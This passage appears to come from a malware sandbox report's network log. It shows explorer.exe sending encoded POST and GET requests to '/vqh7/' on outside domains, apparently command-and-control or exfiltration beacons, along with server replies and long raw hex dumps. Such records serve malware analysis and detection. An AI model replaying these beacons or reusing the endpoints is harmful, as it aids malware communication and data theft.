                                                              Feb 10, 2023 12:45:12.643280029 CET150INData Raw: da 80 81 71 a2 ce 08 ff 16 ff b7 13 ff e6 c0 22 e7 e9 bf ac f0 fb 9e a5 78 57 40 14 15 57 8b fb 16 06 bb bb 26 ec 80 51 19 37 ff 96 f7 b7 93 77 e5 7a ad 7f 59 71 57 85 dd 1e 3c 4f d9 fb be 3d 70 eb e1 a2 2a e9 bd d6 8c 19 6c c9 7b b3 40 86 25 c0
                                                              Data Ascii: q"xW@W&Q7wzYqW<O=p*l{@%"?[7x6q:sC[N '~/;$5yX"Yrvwb4$j]j[Mm"qv}lj<jx
                                                              Feb 10, 2023 12:45:12.778928041 CET151INData Raw: df c4 31 01 f9 47 36 9c 02 ee dd 6a e7 12 77 7b 29 6d 6f af a5 1b 4b bd 06 0c 1e 10 b8 1b 74 0f d8 6c d5 ca f0 ee 25 b3 23 56 cc 9d 1e 99 6d d2 28 dd 84 59 92 fa 08 d5 34 03 1e 43 1e f3 12 d7 8e 98 65 bd 4d a7 27 12 9c e3 97 f6 65 d3 2e 99 ec 55
                                                              Data Ascii: 1G6jw{)moKtl%#Vm(Y4CeM'e.UlhSq_F^WxQ]789F@6>yZWh}8"Q\UkeNRda4{EFf)^=!E%,+!lt isIT-2'QUvJ5*#f,I


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              5192.168.2.349688103.191.208.5080C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:14.409955978 CET161OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.treebarktees.com
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.treebarktees.com
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.treebarktees.com/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 58 74 50 4e 63 45 49 6e 7e 62 62 56 30 37 52 61 6b 78 36 59 34 52 6f 76 5a 47 30 71 58 74 41 6a 6f 48 7e 48 4f 5a 30 5a 6a 42 4c 45 43 31 6a 4f 59 34 74 4b 6c 6a 47 37 44 6d 4c 74 30 43 67 5a 4e 79 32 70 42 6c 76 47 50 64 7e 43 55 73 51 34 6d 42 46 6d 56 71 71 46 52 75 37 64 28 32 6e 33 49 34 73 58 77 74 70 46 39 74 57 4d 71 75 43 6c 28 6d 48 68 4b 47 79 44 47 38 79 62 36 6d 6a 4a 36 79 5a 72 4a 31 59 6a 64 4a 43 71 45 5f 73 2d 73 31 61 57 7a 61 4f 55 74 71 34 74 35 70 4f 6f 56 50 36 62 6f 4c 61 36 49 69 79 39 30 51 41 65 39 54 62 41 44 43 46 6d 65 4d 6a 4d 67 6b 37 6e 71 4f 39 76 73 36 28 6e 44 63 43 5f 70 56 58 76 4f 6f 7e 62 63 68 34 39 75 31 57 4f 57 4a 53 58 7a 69 6b 75 4d 70 58 33 62 54 75 77 47 68 53 62 79 78 4e 48 50 79 4a 6b 65 44 56 53 39 7a 6d 74 69 42 70 32 75 34 32 44 4d 37 78 47 67 48 49 51 33 7a 32 66 61 53 74 69 4c 53 63 59 71 57 6b 6f 5a 65 7e 47 6c 34 58 37 47 73 4a 49 31 52 61 79 7e 77 42 69 6b 52 46 71 4c 42 7e 6a 6a 58 79 7a 4f 63 76 30 30 6b 4b 56 4f 77 52 47 42 6f 35 56 72 54 30 55 39 4f 54 77 6f 6a 6c 44 6b 2d 52 41 55 31 55 2d 4a 4e 42 50 72 64 45 46 4f 5a 6c 5f 5a 4b 57 74 42 79 46 33 54 54 42 43 71 70 68 57 64 67 6e 6f 49 79 59 42 79 62 64 56 7a 78 58 35 28 71 6d 77 76 4a 59 70 52 49 53 73 35 46 4d 68 38 57 54 47 53 42 62 52 34 6a 37 6d 52 54 79 33 4e 64 6b 4f 49 39 4f 5f 59 32 5a 63 69 51 63 7a 47 39 31 32 55 79 65 73 50 55 50 74 34 67 37 6b 71 5f 65 2d 4f 31 73 47 76 79 58 6e 61 64 6f 47 77 50 7a 56 46 43 74 7a 66 36 36 35 70 78 6f 79 56 53 34 63 75 73 34 48 6c 34 7e 51 28 2d 4f 44 6c 6e 71 45 41 48 74 48 65 48 58 34 6d 52 4f 72 68 72 4f 56 63 57 37 50 33 72 48 6f 4c 58 56 7a 73 62 77 79 7a 47 4e 38 31 71 45 7a 6a 31 39 76 30 46 64 69 73 4b 38 30 6f 6d 7e 47 5a 6c 6b 45 57 2d 71 57 65 66 41 63 75 63 72 5f 71 38 55 6e 6d 52 58 30 37 5f 4e 56 52 68 32 48 61 76 45 6e 78 62 75 55 67 66 6f 6f 46 4b 64 4e 77 62 70 62 72 35 72 36 75 4c 49 33 76 49 67 59 70 66 4c 5a 7e 65 46 4d 62 32 45 64 46 50 4a 32 69 5a 72 48 34 7a 52 4a 66 33 61 4b 38 58 41 56 4d 58 6c 6e 33 6d 6c 66 7e 33 51 43 47 33 56 46 58 4f 44 32 70 37 54 66 68 43 43 44 36 5f 65 6d 47 72 79 37 32 71 58 78 56 4a 50 31 55 54 6f 48 44 4c 42 46 4d 52 54 47 4c 4e 49 77 58 30 6f 5a 43 75 6d 57 55 68 63 79 61 70 72 38 31 36 36 53 65 30 6f 42 48 4f 44 31 44 75 38 61 79 46 39 68 43 78 54 4f 6f 46 6d 56 4f 6b 36 6f 36 59 55 48 69 4f 75 66 74 50 61 36 33 61 4c 38 50 35 57 58 49 55 7e 74 72 59 50 44 76 37 31 4b 50 4f 5a 57 78 7a 34 61 6f 4e 31 78 5a 36 64 7a 77 47 61 4c 49 49 5a 4a 48 58 67 76 64 6c 31 48 54 70 70 57 59 32 39 53 57 35 41 49 38 6e 4f 6e 7a 33 70 79 31 6e 62 68 32 66 64 6b 4c 50 52 39 41 75 72 48 61 51 45 4b 38 55 76 49 59 48 4e 77 44 34 4d 4b 58 5a 48 53 6b 6f 30 32 36 35 55 6e 58 48 4c 41 39 4c 65 6f 68 41 75 64 47 73 47 79 6d 36 37 49 4d 34 70 7a 47 6a 4b 43 77 4a 5a 42 76 71 6e 70 43 56 48 4b 4b 57 66 68 32 35 54 36 28 39 36 32 6a 5a 41 6e 43 66 33 48 34 6f 28 45 38 51 52 62 74 67 4d 2d 4b 79 32 52 28 36 50 63 4f 52 70 58 6c 52 6e 50 52 44 72 43 41 4e 54 61 6c 48 52 6b 31 6d 74 30 66 46 51 45 68 37 28 75 59 6a 45 65 79 2d 59 76 52 59 79 38 4a 6e 63 76 65 4f 51 75 48 63 70 6e 6f 67 77 74 59 51 6e 41 35 4c 4d 7a 4e 4c 47 45 77 51 5a 66 57 65 41 56 6a 5f 7a 34 54 4d 6c 34 4d 57 41 45 51 37 69 65 49 32 46 66 78 72 4c 73 66 44 54 7a 42 59 58 52 73 4e 73 51 66 76 42 74 69 66 72 56 4b 52 47 44 72 44 75 42 42 2d 6e 4e 74 67 75 4a 44 64 6c 6b 79 38 6d 75 67 31 73 64 59 36 50 66 61 47 54 4f 73 68 63 71 45 31 7e 44 32 51 31 32 33 4c 6d 38 52 4e 72 67 4e 6e 52 56 4b 65 5a 70 43 33 73 4c 75 6b 61 4c 55 70 73 42 65 2d 5a 6c 33 42 47 58 73 67 5a 4c 66 41 4c 41 43 68 66 72 39 69 6c 31 6e 76 50 75 69 36 31 2d 4e 6e 43 69 34 69 59 76 6e 75 44 35 55 65 4d 61 61 68 4b 6b 50 70 65 34 56 34 65 6c 38 4e 61 30 43 39 50 72 67 4a 6e 39 58 59 62 34 53 63 55 47 62 30 4e 41 54 2d 6c 56 34 49 76 69 6d 2d 48 74 69 4a 79 68 51 48 7a 62 38 4c 5a 43 76 49 6c 62 71 78 65 68 31 57 53 4d 65 47 61 78 68 7a 58 5a 37 30 34 6d 55 63 56 52 53 7a 57 68 78 52 34 56 45 48 34 65 7e 41 41 75 52 68 58 57 50 38 72 37 74 46 35 74 6f 6c 38 58 6f 79 31 34 33 51
                                                              Data Ascii: u1ua=XtPNcEIn~bbV07Rakx6Y4RovZG0qXtAjoH~HOZ0ZjBLEC1jOY4tKljG7DmLt0CgZNy2pBlvGPd~CUsQ4mBFmVqqFRu7d(2n3I4sXwtpF9tWMquCl(mHhKGyDG8yb6mjJ6yZrJ1YjdJCqE_s-s1aWzaOUtq4t5pOoVP6boLa6Iiy90QAe9TbADCFmeMjMgk7nqO9vs6(nDcC_pVXvOo~bch49u1WOWJSXzikuMpX3bTuwGhSbyxNHPyJkeDVS9zmtiBp2u42DM7xGgHIQ3z2faStiLScYqWkoZe~Gl4X7GsJI1Ray~wBikRFqLB~jjXyzOcv00kKVOwRGBo5VrT0U9OTwojlDk-RAU1U-JNBPrdEFOZl_ZKWtByF3TTBCqphWdgnoIyYBybdVzxX5(qmwvJYpRISs5FMh8WTGSBbR4j7mRTy3NdkOI9O_Y2ZciQczG912UyesPUPt4g7kq_e-O1sGvyXnadoGwPzVFCtzf665pxoyVS4cus4Hl4~Q(-ODlnqEAHtHeHX4mROrhrOVcW7P3rHoLXVzsbwyzGN81qEzj19v0FdisK80om~GZlkEW-qWefAcucr_q8UnmRX07_NVRh2HavEnxbuUgfooFKdNwbpbr5r6uLI3vIgYpfLZ~eFMb2EdFPJ2iZrH4zRJf3aK8XAVMXln3mlf~3QCG3VFXOD2p7TfhCCD6_emGry72qXxVJP1UToHDLBFMRTGLNIwX0oZCumWUhcyapr8166Se0oBHOD1Du8ayF9hCxTOoFmVOk6o6YUHiOuftPa63aL8P5WXIU~trYPDv71KPOZWxz4aoN1xZ6dzwGaLIIZJHXgvdl1HTppWY29SW5AI8nOnz3py1nbh2fdkLPR9AurHaQEK8UvIYHNwD4MKXZHSko0265UnXHLA9LeohAudGsGym67IM4pzGjKCwJZBvqnpCVHKKWfh25T6(962jZAnCf3H4o(E8QRbtgM-Ky2R(6PcORpXlRnPRDrCANTalHRk1mt0fFQEh7(uYjEey-YvRYy8JncveOQuHcpnogwtYQnA5LMzNLGEwQZfWeAVj_z4TMl4MWAEQ7ieI2FfxrLsfDTzBYXRsNsQfvBtifrVKRGDrDuBB-nNtguJDdlky8mug1sdY6PfaGTOshcqE1~D2Q123Lm8RNrgNnRVKeZpC3sLukaLUpsBe-Zl3BGXsgZLfALAChfr9il1nvPui61-NnCi4iYvnuD5UeMaahKkPpe4V4el8Na0C9PrgJn9XYb4ScUGb0NAT-lV4Ivim-HtiJyhQHzb8LZCvIlbqxeh1WSMeGaxhzXZ704mUcVRSzWhxR4VEH4e~AAuRhXWP8r7tF5tol8Xoy143QRgTDjN2j61FyKFtuO14UFlDMK2ji9yOwq-eneZS-Rb(3mhR5drkgWgrfEcu07OIcHI3FU7GcJpZzn26IqWVWFU7DcDYqAH8XCgOhdWQSzBHD6wH44AxD70KtvSv-p8IpFXswG8NXhh75~eg4xerwJsEWrMmlRcIOYsNGP2epDM7adQv-wORa8sBdmR6w6TKT2EhDGJS1epCqrr8k74ujbRiaZL9Ttgp42mky94hP0Qq-KCZ4iqeixXj-vbVs3AncUAcFZ9XFwm~XF3kEagJy6GVTUscdzZ(tyobZizpnSNQJWccdcyxjkN(c9uhc7DRYwRp4MU3UKgGZBmsMhuJQa6zuGnA33AhOZ4ekk6Bkhpg-rHI_qEHwhx5uLso5aVbMIxwBP6g2KhUlUpXlSKLlL26_lf5MDFgZYz2HKbLSsjHIVIEPgXL25YrD6gQnzxZhJ26GvBgWJIAzqkoixeMjXfmsNqKA3kMyeif-5oLJfGXsHhQfd8~Tz6dEWEjxQAhyIRz2fMnRAaxSBg(scGa7Z_ONT2AALq982MCkt8Q8SzMHNUSfW3ttMwBrboYtaLAfnJ4Gw-~Y8RbYjvEhIXasIavNq7fQryWmwviRJZ8z(nKKpPVV(B9H7RqnwUg57lsb49iOxUXCaGNdnOn4YPulW8Jm3r9Y4ETLus6M4rBLARZDNzKr8CzPC2FLCTrqNN7PR_x4UsO0hr4rRJ2fEmo5Z8PmxLrsfUyRGlS7y6gAlHSM6ig4sWpK9lo8J0QFipM73yuDaZh5uOw7KKFJl5Gc4CSx3r97pmWrJBTOGqSXRxhHyKC0~7eAye1g9mItDXnhiR1feY0IUdGd~xz7yrH2IBWOa6qknTJYo7L5GnPu0NlqN24zWtEJIznsfgSvN5WftOjMQ8~RH6PGkVX1msA2jfSr00ckOF17hlzuvXLBBUk_tdI0fMMgLHaRH0OrO5aKvT8ZrP(K6UQNvL9-BMtqceGLiZWTvKE_TrVh0olDS3kZWo(rqaLZMe0xX2WB9RSPSWL8DNoM1zBSRy3_5A62sF7ZuFQXwlSsK63MyesdYjFC4cAcpRk58ExD2gMpU4zd8eR3IM~d9-LpZwoGeKIVEmHAGOF2iHM2kswGdI1b5lsJFc14c33g~8Z50uDhgXgUaJsOxlQtzaJKaKw021XW(dRTVhlnU7Ce8b2BPRpsER8t0vM2hWcx4I8vvxHRF52TDjDfHJkE1A63jEiF14H1XEx5siHNaduM(2Ol5Lox1O6HwiwqQ81sbpxrP02OBAkknVvFQVEFcx20p5AYX6bwClq_Lhc7Pt(4(NnpWIU95pD6gQTqeAa2kIRmKeKw2uX3J8hbZTREm2bLU5Y01yy3fxMt566pCnZn6ZCu4a(GnRBuNMoV4HgrpJiAhxHNGR(mdkXpk1Ipv4cJwfPhxhPhsNbMNxHOUJ2mmgn68spw6hrRHDkslQL_wq4AsfhT(QAUviHTQQOib7Z5eUq4sNiozdFRKnhiMhdpwyYSvv~2BI9G8F3qPM8T6FEv1_CUakIx4_7njbZ9IBLyJj~GXcx-orsPMyhl7kymdqJ4UK2hzosPngkvyIJUU32ijePo3B3notTW0CLT6uZWtL~zdsBBKOQT5C6oOprfgJjxrnCW4sGrITWl7FVDErNI2QEc4bhqkd0VKRCwVB2G7vO_BS5MvpvF8vPy6nT-IOZYukehNSsuy6tNfw3JxLVOKT97H_VpdaIafumuu-zQtBUYb-INPwZ3Ag99PwMEkuQI(EdvBRu0eIteL_p9n1OPavacAy7IgRYqkKxknCjmGo4JNhpUM2InxYmVB4KjVgYodv8WNuVZypOvScbWmoMXUA17KS61lxmsr1dsOzHXJnOyYZw9bbNt1ZacfRQGXdjqd57_XufTfkwuVhdzhRpHW7C6GMQNQBy8ZTlPzGz_Kj8rNKjKYhRWTfSUwggocsQtUIWLOcbyQcrl7X0LfGkkrZzNjEBDX2w-2Cd0RisPUdsQmwaDLfz9G4ZPkA01stLYR49tI3wAee85r1WmIStH1upZPdVEcyvKEzDuHdKHlVb-Sjs7Y9yO5eNm9twrRD2BKJOJqc8x6YRWaMjfjdPArFEUqSZMsU74tbuIwFrTXZIT3zZeifZcaN9VGj9vgKNQKarrNjQMQihh4RWn0UwgIA6KAJtnrBx5MPaMElp8W4~Jw0VVXqMg5itYgqRpw3taEn4vxK~ZhOEdo-Y_D_(hX0qNFZCOzcJZlO7IZu2MSSm-w6(8FpDwRG4isBLl4mMIKvYmljE9nUansKe2AUve4B(-YXhrj7qDZ1Oe9n6EfvgtqaLoYVho9xqbPUETAklcPHLPiv(KaXG5pwVCgPjlszYqsILDOEiwyzXlFigtglNvPSXaDCwdnOALu90edfhTzQwbN2Wu~CfsKJIS7KgfBwe0Abe0mqNK(YxisWgY~MgfgcV7LkYLP4WPdyQEvXr6zVeECJowFSM1TeneU3xL8AY8lcw7BsTagcrpCcFZeZdvaRPyF2poeYHsI7bxjoi3tW~ViKSYJo5MZU7c0uG7QkX-qWP1vDJYAnWB0p6GaXTAeXATAqdkbL2OimkmsSmdOMmrZA95ekvLqdobGD(SmNpj4gQg3IL636sTs_wWLxl0z42W1GWr05gtjX2YxbuVUyjf4epNsAUzemRl2NxuBEasy2NQ4o7i4GTnMAIEzyNJlLeRUCCJzGrq3bMsQQ9
                                                              Feb 10, 2023 12:45:15.397419930 CET162INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Fri, 10 Feb 2023 11:45:15 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-powered-by: PHP/8.1.15
                                                              x-litespeed-tag: 90d_HTTP.404
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                              x-litespeed-cache-control: no-cache
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              x-turbo-charged-by: LiteSpeed
                                                              Data Raw: 34 32 36 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 7b 73 e3 b8 b1 38 fa f7 b8 ea 7c 07 2c a7 76 6d 25 24 45 f0 25 4a b6 9c 93 cc 6e ce 6e d5 6e 92 ca 6c f6 d4 af 32 5b 2e 88 84 24 8e 29 92 21 29 cb 5e 1f 57 dd af 71 bf de fd 24 b7 ba 01 92 90 44 3d 6c d9 f9 9d 3c f6 31 43 91 40 77 a3 d1 68 34 1a 8d c6 d5 17 5f ff f1 c3 8f ff e7 4f df 90 79 b5 48 ae cf ae e0 2f 92 b0 74 36 d6 78 6a fc e5 a3 06 ef 38 8b ae cf de 5d 2d 78 c5 48 38 67 45 c9 ab b1 f6 97 1f 7f 6f 04 1a e9 37 5f 52 b6 e0 63 ed 2e e6 ab 3c 2b 2a 8d 84 59 5a f1 b4 1a 6b ab 38 aa e6 e3 88 df c5 21 37 f0 87 4e e2 34 ae 62 96 18 65 c8 12 3e a6 08 87 c8 7f ae ca ea 21 e1 d7 67 f5 6f f8 db 5c 65 f9 c4 28 57 ac 0a e7 e4 71 ed 13 7c 5e c4 a9 80 3c 22 b6 97 df 5f 76 16 98 f3 78 36 af ba 4a 3c ad 95 5f c3 15 2f 66 1d f8 b0 15 5d 90 80 98 63 f0 5c f5 65 23 cf 04 5b 91 79 e7 45 36 c9 aa f2 bc 61 dd f9 82 dd 1b f1 82 cd b8 91 17 1c 58 3b 4a 58 31 e3 e7 c0 f6 ab 2a ae 12 7e fd 27 36 e3 24 cd 2a 32 cd 96 69 44 be 7a 1f d8 94 5e 92 1f 0b ce 27 ac b8 bd ea 8b 62 67 57 49 9c de 92 82 27 e3 f3 28 2d 01 de 94 57 e1 fc 9c cc 0b 3e 1d 9f f7 fb 95 ac 51 71 5e 9a 61 b6 10 48 9a 5a 1a 4b 2a 5e a4 ac e2 1a a9 1e 72 3e d6 58 9e 27 71 c8 aa 38 4b fb 45 59 fe fa 7e 91 68 04 b1 8d b5 1a 3d f9 aa 60 7f 5b 66 97 e4 f7 9c 47 9a c0 a5 cd ab 2a 2f 47 db 18 fb 71 1a f1 7b 33 9f e7 fd 29 e7 51 1f a5 a2 a5 fb 44 0a 3e 64 8b 05 4f ab f2 b9 a4 84 b2 9e 4a 53 19 16 71 5e 5d 9f ad e2 34 ca 56 e6 cd 2a e7 8b ec 73 fc 91 57 55 9c ce 4a 32 26 8f da 84 95 fc 2f 45 a2 8d 64 7b 3f f5 3f f5 4b 73 65 66 c5 ec 53 1f 3b b5 fc d4 0f b3 82 7f ea 63 e5 4f 7d ea 9a 96 69 7d ea 0f ec fb 81 fd a9 af e9 1a bf af b4 91 66 e6 e9 4c d3 b5 f2 6e f6 32 78 e5 dd 0c a1 95 77 b3 6f 04 c0 f2 0e 01 66 cb 22 e4 da e8 51 0b b3 34 64 15 92 21 e9 1d 01 b9 9b 22 f1 a9 bf ca 8d 38 0d 93 65 c4 cb 4f fd cf 25 be c0 6a 46 c1 13 ce 4a 6e 2e e2 d4 fc 5c fe e6 8e 17 63 df a4 26 d5 9e 9e 2e cf fa bf fa 82 fc 38 8f 4b 32 8d 13 4e e2 92 b0 65 95 19 33 9e f2 82 55 3c 22 bf ea 9f 7d 31 5d a6 21 c8 d2 05 d7 99 5e f5 1e ef 58 41 52 bd d0 33 3d 1e 33 33 2c 38 ab f8 37 09 87 3e bc d0 42 96 de b1 52 eb e9 f9 38 36 67 bc fa 00 ca e6 be fa ea 2b f5 d7 85 66 47 5a ef b2 06 4c ca 0b 5e 03 66 e3 8f 55 11 a7 33 73 5a 64 8b 0f 73 56 7c c8 22 ae f3 f1 45 6e 86 09 67 c5 9f 79 58 5d 58 ba a5 c7 a6 d0 58 b1 29 86 75 4f cf cd 69
                                                              Data Ascii: 4269{s8|,vm%$E%Jnnnl2[.$)!)^Wq$D=l<1C@wh4_OyH/t6xj8]-xH8gEo7_Rc.<+*YZk8!7N4be>!go\e(Wq|^<"_vx6J<_/f]c\e#[yE6aX;JX1*~'6$*2iDz^'bgWI'(-W>Qq^aHZK*^r>X'q8KEY~h=`[fG*/Gq{3)QD>dOJSq^]4V*sWUJ2&/Ed{??KsefS;cO}i}fLn2xwof"Q4d!"8eO%jFJn.\c&.8K2Ne3U<"}1]!^XAR3=33,87>BR86g+fGZL^fU3sZdsV|"EngyX]XX)uOi
                                                              Feb 10, 2023 12:45:15.397497892 CET164INData Raw: 9c 24 3f f2 fb ea 82 99 30 06 1e 2e aa 79 5c ea bc a7 5b ba d5 d3 63 b3 ca be 66 15 fb cb 9f bf bf e8 f5 2e 0b 5e 2d 8b 94 bc 1c 6e 25 e1 f2 f1 78 bc 06 fb a9 69 58 78 c1 05 bf aa 6d 4e 09 51 d5 7a 97 95 59 16 e1 98 eb 95 19 f1 29 2f c6 95 29 86
                                                              Data Ascii: $?0.y\[cf.^-n%xiXxmNQzY)/)11YRgPw?_h0hZ?Cy}ItQYq[B&dKROrP/yF_Xzbl]WtV/_Bku"[z*EnB~J)kUk{LJ
                                                              Feb 10, 2023 12:45:15.397556067 CET165INData Raw: f7 97 50 5e 08 22 48 a3 32 5d e1 e4 80 92 5c 4a c1 6d 3f 3e fd 27 6a 5a 72 d1 3a 7e 06 81 9d df f7 1e 5b 96 d4 84 b5 08 d2 6c 1d c5 93 22 f0 b2 b4 c9 0a 6e d4 f3 53 f2 20 66 28 1e 19 55 96 3f aa 04 21 d0 b2 62 45 75 3c 8c 90 a7 15 2f d6 c0 88 57
                                                              Data Ascii: P^"H2]\Jm?>'jZr:~[l"nS f(U?!bEu</W]4jY/lNK#*Xx##KE6#2.GTxvu)X-!&"[685nh#"bD=T[e/4x-6joYQ)lGuLIsy$F)x-y2
                                                              Feb 10, 2023 12:45:15.397612095 CET166INData Raw: c6 88 96 d2 a8 b1 4a 05 bb 11 71 d8 f7 b2 4a d5 7b a3 40 20 6c cd 6d d6 c1 be b5 05 87 a5 80 ee 68 58 37 ab eb 01 df ec 68 60 78 db 05 35 69 af bb 82 50 1a 72 c3 a5 15 5f 75 4e 69 df 1a 2c 0d e7 59 b1 43 b4 bb eb 74 bf 95 90 46 2c ac e2 3b fe 8a
                                                              Data Ascii: JqJ{@ lmhX7h`x5iPr_uNi,YCtF,;Q"f 2E![x_a$,+FmvzdS{2-/Yk N#4"@E9Bn`s5S,9b"tj`Y];."L&I++cIv4
                                                              Feb 10, 2023 12:45:15.397677898 CET168INData Raw: 7b c0 78 29 c5 65 15 c5 8b c7 3c 2b 45 8c 11 9b 94 59 b2 ac f8 65 0c 11 cd 10 95 db 1c 14 af c3 2c d6 55 70 07 a6 16 5a c1 13 06 21 30 6f 42 f7 0c 02 a5 78 da e1 83 c6 60 a6 9c 41 14 fc 9b 60 8e e2 85 61 3d 66 39 0b e3 ea 61 a4 4e c0 1d dc 78 79
                                                              Data Ascii: {x)e<+EYe,UpZ!0oBx`A`a=f9aNxyEb^`_y3,Ey]y+XTe`Y[KfXaV3!%L3xP&A9b`kC!_8_dp5wWjyjM(_MTA4<
                                                              Feb 10, 2023 12:45:15.397737026 CET169INData Raw: 6d 80 78 01 e7 36 20 ec e5 5c bc 98 fd 35 4c 58 59 fe 6a 0c 79 3f 31 f3 fe cf bd 47 75 20 ac bb e5 9f a6 f1 6c 59 f0 66 a1 4b 2c f0 2f 74 2f 41 66 49 36 81 2b 0f 60 e1 bf 71 e4 7d 92 45 0f 62 f9 d1 18 ab 28 b5 86 31 49 58 78 3b 22 10 9b 0c 51 af
                                                              Data Ascii: mx6 \5LXYjy?1Gu lYfK,/t/AfI6+`q}Eb(1IXx;"Q7k-gI:W#~tY<NtDL.+6cyNmnnxrfV@^D]~NvW;I$'rM}k#&R3xDaw@m0GpQ-YzUv@
                                                              Feb 10, 2023 12:45:15.397789955 CET170INData Raw: de bb 84 4d 1d 8b 8a 3a 39 45 db 08 82 b6 00 9f a0 6b 76 40 ac 35 8d db 38 a2 d6 e5 42 25 61 5d cf 1c 64 85 a2 63 70 6b 64 9d 75 33 96 1b 06 5c e4 09 50 c1 24 db 62 2e 96 98 67 45 fc 0b c4 56 25 23 8c 55 83 2e d7 e1 16 a4 4d 6d 83 a5 eb 90 ed 03
                                                              Data Ascii: M:9Ekv@58B%a]dcpkdu3\P$b.gEV%#U.Mme%GW^X,(Dd+( 6"/( V:q} -+0r!dC,#i.QtkFUk"aG"Ru))IZj[ln&G
                                                              Feb 10, 2023 12:45:15.397850037 CET172INData Raw: 56 cb 75 3d b9 d4 51 35 62 62 95 2b fb 43 c0 37 81 74 e0 91 33 d4 0b 28 3f 62 66 7a 01 d4 23 67 a4 17 40 16 63 fc 59 33 d1 0b b0 6c 4c 04 62 f5 d1 c1 f7 8d 72 72 06 3a 1d e1 f1 33 cf 4b 70 bd 64 c6 79 01 9e 17 cc 34 2f c0 f2 fc 19 e6 05 48 9e 3b
                                                              Data Ascii: Vu=Q5bb+C7t3(?bfz#g@cY3lLbrr:3Kpdy4/H;`$/wy31^{4-z,I&}]Zhc@(6c$m#t~@Nh]gp5M<aJ;&y;h:ID'n4|5\-GN
                                                              Feb 10, 2023 12:45:15.397905111 CET173INData Raw: 6d 6b 9b 9e 49 b7 6d db 03 b4 fe 6d 19 87 b7 77 31 5f bd 01 b5 0d 6c a4 b7 f9 75 22 c5 77 ac 88 d1 e3 65 94 2b 56 85 73 5e be 01 e9 0d 92 9b 1a 09 b6 61 fb f5 89 8d 59 c5 e5 bc bd fb e7 99 2b 9f fd b2 52 83 16 ee 04 89 e7 10 b9 65 58 c4 79 45 aa
                                                              Data Ascii: mkImmw1_lu"we+Vs^aY+ReXyE58d/U<1.wWQ|G0SXSVJqj$b3hR<==](y8~LX0-1]Zq9Ny\&H\IpVr(N9\.Hl1S2
                                                              Feb 10, 2023 12:45:15.397962093 CET174INData Raw: da 80 81 71 a2 ce 08 ff 16 ff b7 13 ff e6 c0 22 e7 e9 bf ac f0 fb 9e a5 78 57 40 14 15 57 8b fb 16 06 bb bb 26 ec 80 51 19 37 ff 96 f7 b7 93 77 e5 7a ad 7f 59 71 57 85 dd 1e 3c 4f d9 fb be 3d 70 eb e1 a2 2a e9 bd d6 8c 19 6c c9 7b b3 40 86 25 c0
                                                              Data Ascii: q"xW@W&Q7wzYqW<O=p*l{@%"?[7x6q:sC[N '~/;$5yX"Yrvwb4$j]j[Mm"qv}lj<jx
                                                              Feb 10, 2023 12:45:15.544486046 CET176INData Raw: df c4 31 01 f9 47 36 9c 02 ee dd 6a e7 12 77 7b 29 6d 6f af a5 1b 4b bd 06 0c 1e 10 b8 1b 74 0f d8 6c d5 ca f0 ee 25 b3 23 56 cc 9d 1e 99 6d d2 28 dd 84 59 92 fa 08 d5 34 03 1e 43 1e f3 12 d7 8e 98 65 bd 4d a7 27 12 9c e3 97 f6 65 d3 2e 99 ec 55
                                                              Data Ascii: 1G6jw{)moKtl%#Vm(Y4CeM'e.UlhSq_F^WxQ]789F@6>yZWh}8"Q\UkeNRda4{EFf)^=!E%,+!lt isIT-2'QUvJ5*#f,I


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              6192.168.2.349689103.191.208.5080C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:17.082138062 CET180OUTGET /vqh7/?u1ua=avntfzZWwL7S+bFx7xC7yR8pR0BqdKNL+mi6NO8or2/YUjOFXpJJhQb6NE3o2hVXLy/LWl7MJMKHcu5A7Cd4caz4W6nJ0FH5Jw==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.treebarktees.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:45:17.859095097 CET180INHTTP/1.1 301 Moved Permanently
                                                              Server: nginx
                                                              Date: Fri, 10 Feb 2023 11:45:17 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Content-Length: 0
                                                              Connection: close
                                                              x-powered-by: PHP/8.1.15
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              x-redirect-by: WordPress
                                                              location: http://treebarktees.com/vqh7/?u1ua=avntfzZWwL7S+bFx7xC7yR8pR0BqdKNL+mi6NO8or2/YUjOFXpJJhQb6NE3o2hVXLy/LWl7MJMKHcu5A7Cd4caz4W6nJ0FH5Jw==&4sHXq=qmMaHdA-N1MF
                                                              x-litespeed-cache: miss
                                                              x-turbo-charged-by: LiteSpeed


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              7192.168.2.349690148.251.13.12680C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:23.243403912 CET181OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.gachthe365.site
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.gachthe365.site
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.gachthe365.site/vqh7/
